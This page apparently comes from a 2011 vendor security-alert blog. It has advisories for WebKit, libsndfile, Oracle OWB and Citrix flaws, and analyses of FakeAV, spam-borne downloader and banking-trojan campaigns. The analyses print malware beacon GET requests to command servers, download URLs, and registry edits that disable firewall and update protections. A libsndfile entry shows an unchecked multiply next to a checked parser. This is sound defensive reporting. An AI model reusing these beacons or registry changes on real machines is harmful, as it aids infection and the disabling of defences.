Posts

Apple Safari WebKit SVG Memory Corruption (Aug 1, 2011)

Safari is a web browser developed by Apple Inc. and included with the Mac OS X and iOS operating systems. The browser is capable of processing HTML, images, scripting languages, and various other media formats. Safari is based on Apple’s internal fork of the KHTML rendering engine, called WebKit. WebKit provides the WebCore HTML parser and the JavaScriptCore JavaScript engine.

The Document Object Model (DOM) is a cross-platform and language-independent convention for representing and interacting with objects in HTML, XHTML and XML documents. DOM has a hierarchical structure in which HTML tag and attribute data is stored as elements of this hierarchy. WebKit supports manipulation of DOM objects via “client-side” scripting (e.g. JavaScript), allowing for dynamic modification of an HTML document.

Scalable Vector Graphics (SVG) is a family of specifications of an XML-based file format for describing two-dimensional vector graphics, both static and dynamic. The SVG specification is an open standard that has been under development by the World Wide Web Consortium (W3C) since 1999. SVG is supported by most modern web browsers, including Safari.

A memory corruption vulnerability has been found in the WebKit component of Safari. The vulnerability is due to the corruption of certain pointers in DOM objects relating to SVG elements. An attacker can exploit this vulnerability to inject and execute malicious code in the security context of the logged in user.

SonicWALL UTM team has researched this vulnerability and created the following IPS signatures to capture the attacks in the wild.

  • 1149 Apple Safari SVG Object Memory Corruption 1
  • 1158 Apple Safari SVG Object Memory Corruption 2

This vulnerability has been assigned the identifier CVE-2011-0222.

Wrong Hotel transaction spam campaign (July 28, 2011)

SonicWALL UTM Research team observed a new spam campaign in the wild pretending to be from known hotels such as Embassy Suites, Marriott, etc. The e-mail contains an apology note from the hotel’s reservation department listing details about a wrong transaction applied to the recipient’s credit card. It then asks the user to download and fill out the refund form attached to the e-mail. The attachment is a zip file containing a malicious Fake AV Downloader Trojan executable.

A sample e-mail message looks like:

screenshot

A sample list of e-mail subjects showing various Hotels masqueraded in this campaign till now:

screenshot

The executable file inside the zip attachment has an icon disguised as a Microsoft Excel file:

screenshot

The file if executed will perform activity similar to what we have seen in previous variants:

  • Creates a process SVCHOST.EXE and injects code into it.
  • Reports the infected machine to a server on domain yomwar(REMOVED).ru by sending the following GET request:
    • GET /forum3/task.php?bid=a67a41eXXXXX23&os=5-1-2600&uptime=0&rnd=229125
  • Drops the following files:
    • (Startup)\dxdiag.exe [Copy of itself that starts upon system reboot and runs the Fake AV]
    • (Application Data)\gL11000PgAgJ11000gL11000PgAgJ11000.exe [GAV: Fakesysdef.BDO (Trojan), downloaded from radio-80.com]

  • Deletes the original copy of the file.
  • Runs the downloaded new Fake AV Trojan variant, which performs the following activity after a 500 millisecond sleep:
    • Displays multiple fake infections in the Rogue AV GUI
      screenshot

    • Unlike previous Fake AV variants, it does not hide the user’s program files but instead makes them unusable: it terminates any user-initiated process while displaying a fake alert message
      screenshot

    • Prompts the user to purchase the full version in order to clean up the fake infections
      screenshot

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Injecter.GFY (Trojan)
  • GAV: Zbot.ASK_2 (Trojan)
  • GAV: Kryptik.QUV (Trojan)

libsndfile PAF File Integer Overflow (July 28, 2011)

libsndfile is a widely-used C library for reading and writing audio files. It supports a wide variety of audio encodings and sound file formats and will convert automatically from one to another. In addition to the library itself, the package provides command-line programs for converting one format to another (sndfile-convert), for playing audio files (sndfile-play), and for obtaining information about the contents of an audio file (sndfile-info).

libsndfile supports many different audio file formats, including Creative Technology’s (formerly Ensoniq’s) Professional Audio Recording Integrated System (PARIS) Audio Format (PAF). The PAF is a linear Pulse-code modulation (PCM) based format that can store 8, 16, or 24-bit samples. The format of the PAF file header is:

  Offset  Length  Description
  ------  ------  ------------------------------------------------------
  0x0000  4       File format marker (also determines header endianness)
  0x0004  4       Version
  0x0008  4       Endianness specification
  0x000C  4       Sample rate
  0x0010  4       Format (sample size)
  0x0014  4       Number of channels
  0x0018  4       Source

An integer overflow vulnerability exists in the PAF processing code of the libsndfile library. The vulnerable code does not validate the values taken from the PAF file header when calculating the amount of memory to allocate, so a crafted header can cause the size calculation to overflow and an undersized buffer to be allocated. A remote, unauthenticated attacker can exploit this vulnerability to inject and execute arbitrary code in the context of the affected user.
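A defensive header parser for the layout above, added here as an example and not libsndfile’s own code: it derives the buffer size with an overflow-checked multiply and rejects headers whose product would wrap, alongside the unchecked 32-bit product for contrast. The marker bytes "PAFB"/"PAFL", the 32-sample block length, the reading of the Format field as a bit depth and the allocation formula channels × bytes-per-sample × block length are assumptions made for illustration.

```c
/* Added example (not libsndfile's code): parse the PAF header laid out above and
 * size the sample buffer with overflow-checked arithmetic. Assumed for illustration:
 * markers "PAFB"/"PAFL" select header endianness, Format holds the sample size in
 * bits, and the allocation is channels * bytes_per_sample * SAMPLES_PER_BLOCK. */
#include <stdint.h>
#include <string.h>
#define PAF_HEADER_LEN    28
#define SAMPLES_PER_BLOCK 32u   /* assumed block length, not libsndfile's value */

static const unsigned char MARKER_BE[4] = { 'P', 'A', 'F', 'B' }; /* constructed */
static const unsigned char MARKER_LE[4] = { 'P', 'A', 'F', 'L' }; /* constructed */
enum { PAF_OK = 0, PAF_ERR_SHORT, PAF_ERR_MARKER, PAF_ERR_FORMAT, PAF_ERR_CHANNELS, PAF_ERR_OVERFLOW };

typedef struct {
    int big_endian;
    uint32_t sample_rate, format, channels;  /* version, endianness spec, source skipped */
    uint32_t block_bytes;                    /* validated allocation size for one block */
} paf_header;

static uint32_t read_u32(const unsigned char *p, int big_endian) {
    uint32_t v = 0;
    for (int i = 0; i < 4; i++)
        v |= (uint32_t)p[i] << (big_endian ? 8 * (3 - i) : 8 * i);
    return v;
}

static void write_u32(unsigned char *p, uint32_t v, int big_endian) {
    for (int i = 0; i < 4; i++)
        p[i] = (unsigned char)(v >> (big_endian ? 8 * (3 - i) : 8 * i));
}

/* Unchecked 32-bit product: a hostile channel count wraps it to a tiny size, and
 * copying a full block into a buffer of that size overruns the heap. */
uint32_t naive_block_size(uint32_t channels, uint32_t bytes_per_sample) {
    return channels * bytes_per_sample * SAMPLES_PER_BLOCK;
}

/* Widen to 64 bits and refuse any product that does not fit in 32 bits. */
static int mul_u32_checked(uint32_t a, uint32_t b, uint32_t *out) {
    uint64_t r = (uint64_t)a * b;
    if (r > UINT32_MAX) return 1;
    *out = (uint32_t)r;
    return 0;
}

int paf_parse_header(const unsigned char *buf, size_t len, paf_header *h) {
    if (len < PAF_HEADER_LEN) return PAF_ERR_SHORT;
    if (memcmp(buf, MARKER_BE, 4) == 0)      h->big_endian = 1;
    else if (memcmp(buf, MARKER_LE, 4) == 0) h->big_endian = 0;
    else return PAF_ERR_MARKER;
    h->sample_rate = read_u32(buf + 0x0C, h->big_endian);
    h->format      = read_u32(buf + 0x10, h->big_endian);
    h->channels    = read_u32(buf + 0x14, h->big_endian);
    if (h->format != 8 && h->format != 16 && h->format != 24) return PAF_ERR_FORMAT;
    if (h->channels == 0) return PAF_ERR_CHANNELS;
    uint32_t per_frame;   /* channels * bytes per sample */
    if (mul_u32_checked(h->channels, h->format / 8, &per_frame) ||
        mul_u32_checked(per_frame, SAMPLES_PER_BLOCK, &h->block_bytes))
        return PAF_ERR_OVERFLOW;   /* reject instead of allocating a wrapped size */
    return PAF_OK;
}

/* Build a constructed header (fields in the table's order) to exercise the parser. */
void make_header(unsigned char out[PAF_HEADER_LEN], int big_endian,
                 uint32_t rate, uint32_t format, uint32_t channels) {
    uint32_t fields[6] = { 1, (uint32_t)big_endian, rate, format, channels, 0 };
    memcpy(out, big_endian ? MARKER_BE : MARKER_LE, 4);
    for (int i = 0; i < 6; i++) write_u32(out + 4 + 4 * i, fields[i], big_endian);
}
```

With a channel count of 0x40000000 and 16-bit samples the unchecked product wraps to 0 while the checked parser returns PAF_ERR_OVERFLOW.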

SonicWALL UTM team has researched and analyzed this vulnerability. Two IPS signatures have been created to detect and prevent attacks exploiting this issue.

  • 1109 libsndfile PAF File Integer Overflow 1
  • 1111 libsndfile PAF File Integer Overflow 2

This vulnerability has been assigned the identifier CVE-2011-2696.

Oracle Warehouse Builder SQL Injection (July 22, 2011)

Oracle Warehouse Builder (OWB) is an Extract, Transform, and Load (ETL) tool for managing data for business intelligence systems. Every Oracle 11g database product includes OWB as a bundled component. The Oracle Database supports querying and programming with the Structured Query Language (SQL), PL/SQL (Procedural Language / SQL), and Java. PL/SQL is Oracle’s procedural extension to SQL allowing the use of variables, conditional and loop constructs, functions, as well as some object-oriented features. PL/SQL program units can be pre-compiled and stored in the database. The Java runtime is also integrated with the SQL and PL/SQL database engines and enables the use of Java in stored procedures.
An example of a PL/SQL statement that defines a stored Java class is shown below:

    create or replace and resolve java source named "TESTING" as
    import java.lang.*;
    import java.io.*;
    public class Hello {
        public static void HelloWorld() {
            System.out.println("This is a test");
        }
    }

By default, OWB includes a database user named OWBREPOS_OWNER. This user holds a number of critical roles and privileges that allow it to read all data in the database (including user password hashes). OWBREPOS_OWNER can also execute OS commands and can therefore obtain SYSDBA rights.

A privilege escalation vulnerability has been found in Oracle Warehouse Builder. A specific stored procedure in the OWBREPOS_OWNER package performs insufficient input validation on all of its parameters, and execute permission on this procedure is granted to PUBLIC by default. By inserting escaped single quotes (denoted by two single quotes) into one of the string parameters, SQL, PL/SQL and Java code can be injected and executed with the privileges of OWBREPOS_OWNER.

An attacker with limited user privileges could use this vulnerability to read arbitrary data including password hashes from the database, and execute arbitrary SQL, PL/SQL and Java code, and operating system commands in the security context under which the database is running, effectively compromising the database server completely.

SonicWALL has multiple generic IPS signatures that address SQL injection attempts. The following IPS signatures proactively address attacks targeting this vulnerability.

  • 1421 – SQL-INJECTION Generic SQL Injection Attempt 7
  • 1661 – SQL-INJECTION Generic SQL Injection Attempt 8
  • 4161 – SQL-INJECTION Generic SQL Injection Attempt 16

This vulnerability has been assigned the identifier CVE-2011-0799 by MITRE.
The vendor has released an advisory addressing this issue.

Email Spam leads to Banking Trojan (July 21, 2011)

SonicWALL UTM Research team received reports of a new online banking Trojan seen in the wild. This Trojan steals the security credentials used to manage online banking accounts, targeting customers of the South American bank Caixa Group.

Users receive an e-mail, similar to the screenshot below, about a banking transaction. The e-mail contains a link purported to be the proof or receipt of the transaction, but which instead leads to the download of the banking Trojan.

    screenshot

    Translated to English:

    Portuguese (detected) to English translation
    ————————————————–
    PROOF OF SCHEDULE
    ————————————————–

    Please be advised that scheduling was made in Internal Transfer
    BPI service online, with the following data:

    Schedule Date – 07/18/2011 06:16
    Operation Type – Issuance of checks on foreign
    Nr Documento2342576678899 (9.12 kb)

The email link leads to a compromised website which serves the trojan: http://cla{REMOVED}ua/…/bpi23045.asp

Once the user clicks the link, the message below is displayed claiming that Adobe Reader is outdated, and the user is redirected to a download page.

    screenshot

The Adobe Reader download page is fake and will actually serve the banking trojan.

    screenshot

    screenshot

In order to disguise the banking Trojan as a legitimate installer, it uses the Adobe Flash icon shown below:

After installation, the trojan will launch these pages to let the user think that it installed a legitimate Adobe Reader and will ultimately show the online banking transaction.

    screenshot

    screenshot

Installed files:

  • %systemdir%\1kl1.exe [ detected as GAV: VBKrypt.CQZR (Trojan) ]
  • %systemdir%\xservicex.exe [ detected as GAV: VBKrypt.CQZR (Trojan) ]
  • %temp%\header_10.1.45.2.exe [ detected as GAV: VBKrypt.CQZR (Trojan) ]

Added Registry:

  • Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value: xservicex
    Data: "%systemdir%\1kl1.exe"

Network Activity:

HTTP Requests:

  • http://www.ca{REMOVED}/lnkFloud.php
  • http://www.d{REMOVED}tyjytj/…/c.php
  • http://sch{REMOVED}/willkohead.png

SonicWALL Gateway AntiVirus provided proactive protection against this threat via the following existing signatures:

  • GAV: VBKrypt.CQZR (Trojan)
  • GAV: Banker.UTV (Trojan)

screenshot

XP Internet Security 2012. FakeAV trend continues. (Jul 14, 2011)

The SonicWALL UTM Research team received reports of a FakeAV called XP Internet Security 2012. FakeAV software of this nature continues to be a steadily growing trend and has been covered in some of our previous SonicALERTs. Once installed, this software disables the Windows firewall, Windows automatic updates and Windows Security Center antivirus notifications. It then proceeds with its campaign to sell the software to the infected victim.

The Trojan performs the following DNS query:

      hises{removed}.com

The Trojan brings up the following fake system scan dialogs a few seconds after infection:

The Trojan periodically brings up the following messages in an attempt to encourage the user to buy the software:

The Trojan makes the following GET request to a remote webserver (hises{removed}.com):

The Trojan was seen receiving the following data in response to the above GET request:

The Trojan creates the following files on the filesystem:

  • C:\Documents and Settings\{USER}\Local Settings\Application Data\uwk.exe [Detected as GAV: Kryptik.QFG (Trojan)]
  • C:\Documents and Settings\All Users\Application Data\c1xisgac1m22i0vav24c46v8xoky2du4 [Detected as GAV: Kryptik.QFG_2 (Trojan)]
  • C:\Documents and Settings\{USER}\Local Settings\Application Data\c1xisgac1m22i0vav24c46v8xoky2du4 [Detected as GAV: Kryptik.QFG_2 (Trojan)]
  • C:\Documents and Settings\{USER}\Local Settings\Temp\c1xisgac1m22i0vav24c46v8xoky2du4 [Detected as GAV: Kryptik.QFG_2 (Trojan)]
  • C:\Documents and Settings\{USER}\Templates\c1xisgac1m22i0vav24c46v8xoky2du4 [Detected as GAV: Kryptik.QFG_2 (Trojan)]

The Trojan creates the following registry keys in the Windows registry:

    Enable startup:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 453461717 "C:\Documents and Settings\{USER}\Local Settings\Application Data\uwk.exe"

    Shell spawning:

  • HKEY_CLASSES_ROOT\.exe\shell\open\command @ ""C:\Documents and Settings\{USER}\Local Settings\Application Data\uwk.exe"
  • HKEY_CURRENT_USER\Software\Classes\.exe\shell\open\command @ ""C:\Documents and Settings\{USER}\Local Settings\Application Data\uwk.exe"
  • HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command @ ""C:\Documents and Settings\{USER}\Local Settings\Application Data\uwk.exe"

    Disable Windows firewall and notifications:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile EnableFirewall dword:00000000
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile DoNotAllowExceptions dword:00000000
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile DisableNotifications dword:00000001
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile EnableFirewall dword:00000000
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DoNotAllowExceptions dword:00000000
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DisableNotifications dword:00000001

The Trojan makes the following registry modifications:

    Disable Windows antivirus check and notifications (old value, new value):

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center AntiVirusDisableNotify dword:00000000 dword:00000001
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center FirewallDisableNotify dword:00000000 dword:00000001
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center UpdatesDisableNotify dword:00000000 dword:00000001
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center AntiVirusOverride dword:00000000 dword:00000001
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center FirewallOverride dword:00000000 dword:00000001

The Trojan deletes everything under the following registry keys to disable Windows automatic updates:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WUAUSERV
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Kryptik.QFG (Trojan)
  • GAV: Kryptik.QFG_2 (Trojan)

Microsoft Security Bulletin Coverage (July 12, 2011)

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of July, 2011. A list of issues reported, along with SonicWALL coverage information follows:

MS11-053 Vulnerability in Bluetooth Stack Could Allow Remote Code Execution (2566220)

  • Bluetooth Stack Vulnerability – CVE-2011-1265
    Attacks targeting this vulnerability would occur over Bluetooth.

MS11-054 Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2555917)

  • Win32k Use After Free Vulnerability – CVE-2011-1874
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1875
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1876
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1877
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1878
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1879
    This is a local vulnerability.
  • Win32k Null Pointer De-reference Vulnerability – CVE-2011-1880
    This is a local vulnerability.
  • Win32k Null Pointer De-reference Vulnerability – CVE-2011-1881
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1882
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1883
    This is a local vulnerability.
  • Win32k Use After Free Vulnerability – CVE-2011-1884
    This is a local vulnerability.
  • Win32k Null Pointer De-reference Vulnerability – CVE-2011-1885
    This is a local vulnerability.
  • Win32k Incorrect Parameter Validation Allows Information Disclosure Vulnerability – CVE-2011-1886
    This is a local vulnerability.
  • Win32k Null Pointer De-reference Vulnerability – CVE-2011-1887
    This is a local vulnerability.
  • Win32k Null Pointer De-reference Vulnerability – CVE-2011-1888
    This is a local vulnerability.

MS11-055 Vulnerability in Microsoft Visio Could Allow Remote Code Execution (2560847)

  • Microsoft Visio Insecure Library Loading Vulnerability – CVE-2011-3148
    IPS 5726 Possible Binary Planting Attempt

MS11-056 Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2507938)

  • CSRSS Local EOP AllocConsole Vulnerability – CVE-2011-1281
    This is a local vulnerability.
  • CSRSS Local EOP SrvSetConsoleLocalEUDC Vulnerability – CVE-2011-1282
    This is a local vulnerability.
  • CSRSS Local EOP SrvSetConsoleNumberOfCommand Vulnerability – CVE-2011-1283
    This is a local vulnerability.
  • CSRSS Local EOP SrvWriteConsoleOutput Vulnerability – CVE-2011-1284
    This is a local vulnerability.
  • CSRSS Local EOP SrvWriteConsoleOutputString Vulnerability – CVE-2011-1870
    This is a local vulnerability.

Financial spam campaigns on the rise (July 08, 2011)

SonicWALL UTM Research team continued to observe an increase in financial spam campaigns pretending to be from a credit card company. The e-mail attempts to grab the reader’s attention by stating that their credit card bill is overdue. The attachment, purporting to be a financial statement, is a newer variant of the FakeAV we analyzed earlier.

The spam campaign is shown below:

screenshot

It performs the following activities when executed:

  • It creates the following files:
    • Start Menu\Programs\Startup\dxdiag.exe (Copy of itself) [Detected as GAV: Aspxor.Y (Trojan)]
    • WINDOWS\system32\aspimgr.exe [Detected as GAV: Danmec.E (Trojan)]
    • WINDOWS\dvcbdt1.dll [Detected as GAV: Mufanom.BLDH (Trojan)]
    • %temp%\rrtegggggggg[1].exe [Detected as GAV: FakeAV.AHV (Trojan)]
    • %temp%\gggssgsdggg[1].exe [Detected as GAV: Mufanom.BLDH (Trojan)]
    • %temp%\bibalabibabuba[1].exe [Detected as GAV: Aspxor.Z (Trojan)]
  • It reports new infection to a remote server:
    • GET /forum1/task.php?bid=462e39cb208270ad&os=5-1-2600&uptime=0&rnd=574609 HTTP/1.1
  • It downloads further files from a remote server using a custom user-agent string:
    • GET /forum1/load.php?module=grabbers HTTP/1.1
      User-Agent: Our_Agent
  • It creates the following registry entry to ensure infection on reboot:
    • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Ulazebebebag "rundll32.exe "C:\WINDOWS\dvcbdt1.dll",Startup"
  • It displays fake scans and infections and prompts the user to purchase the product in order to clean their computer.

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: Oficla.FS (Trojan)
  • GAV: Oficla.FS#email (Trojan)
  • GAV: Aspxor.Y (Trojan)
  • GAV: Aspxor.Z (Trojan)
  • GAV: Danmec.E (Trojan)
  • GAV: Mufanom.BLDH (Trojan)
  • GAV: FakeAV.AHV (Trojan)

screenshot

Citrix Provisioning Services Buffer Overflow (Jul 8, 2011)

Citrix Provisioning Services is a workload (operating system, application, and configuration) management system. It maximizes the flexibility of hardware resources by requiring no software to be preloaded on the managed systems; instead, computers obtain their operating system and applications from the network in real time. A proprietary communication protocol is used between the Provisioning Server and the other components.

Several buffer overflow vulnerabilities exist in Citrix Provisioning Services. Specifically, the vulnerabilities are due to insufficient validation of data sent to streamprocess.exe, which listens on port 6905/udp. An attacker can exploit these vulnerabilities by sending crafted packets to the target server. Successful exploitation would allow arbitrary code injection and execution with the privileges of the streamprocess.exe process. Code injection that does not result in execution would terminate the service due to memory corruption.

SonicWALL has released several IPS signatures to detect and block known exploits targeting these vulnerabilities. The signatures are listed below:

  • 6346 – Citrix Provisioning Services Buffer Overflow 1
  • 6794 – Citrix Provisioning Services Buffer Overflow 2

Fake Credit Card and IRS notices (June 30, 2011)

SonicWALL UTM Research team observed two new spam campaigns in the past few days pretending to contain notices from a credit card company or the Internal Revenue Service (IRS). The e-mails carry the Downloader Trojan Chepvil as an attachment. Chepvil is a Trojan that silently downloads and installs malware components or other malware, including Rogue AV. SonicWALL has so far received more than 100,000 copies of e-mails from these spam campaigns, delivering 74 unique malicious binaries, and the campaigns were still active at the time of writing.

Campaign #1 – Credit Card Overdue notice spam

Subject:

  • Credit Card Overdue

Attachment: Customer details.zip (contains Customer details.exe)

The e-mail message looks like below:

screenshot

Campaign #2 – IRS notification spam

Subject:

  • IRS notification

Attachment: IRS document.zip (contains IRS document.exe)

The e-mail message looks like below:

screenshot

The executable file inside the zip attachment has an icon disguised as an Acrobat Reader PDF file:

screenshot

If the user downloads and executes the malicious executable inside the zip attachment, it performs the following activity:

  • Creates a process SVCHOST.EXE and injects code into it.
  • Deletes the original copy of the file.
  • Reports the infected machine by sending the following GET request:
    GET /404.php?type=stats&affid=531&subid=01&awok HTTP/1.1
    User-Agent: IE
    Host: click(REMOVED).org
  • Downloads Fake AV Trojan from a remote server mysteryforyou1.ru to the following location and executes it:
    • (Application Data)\dRBAHQLTbF.exe – [ detected as GAV: FakeAV.PSL (Trojan) ]

  • The Fake AV Trojan periodically moves all the user’s programs into (TEMP)\smtmp\(N) [where N = 1,2,3...], making them unavailable to the user, and also hides the user’s files. Commands and features found in the analysis are shown below:

    screenshot

    Languages supported:

    screenshot

    More details about this Fake AV Trojan’s functionality can be found in one of our previous SonicALERTs: Fake Desktop Utilities on the rise (June 8, 2011)

  • Other dropped files include:
    • (TEMP)\trol.exe – [ detected as GAV: Agent.SEO (Trojan) ]
    • (TEMP)\javaw.exe – [ detected as GAV: Suspicious#polycrypt.4_2 (Worm) ]
  • Registry modification to ensure the Fake AV runs upon system reboot:
    • Key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Run
      Value: dRBAHQLTbF
      Data: (Application Data)\dRBAHQLTbF.exe

SonicWALL Gateway AntiVirus blocks the spammed Downloader Trojan Chepvil proactively via the following signature:

  • GAV: Suspicious#Chepvil.K (Trojan)

screenshot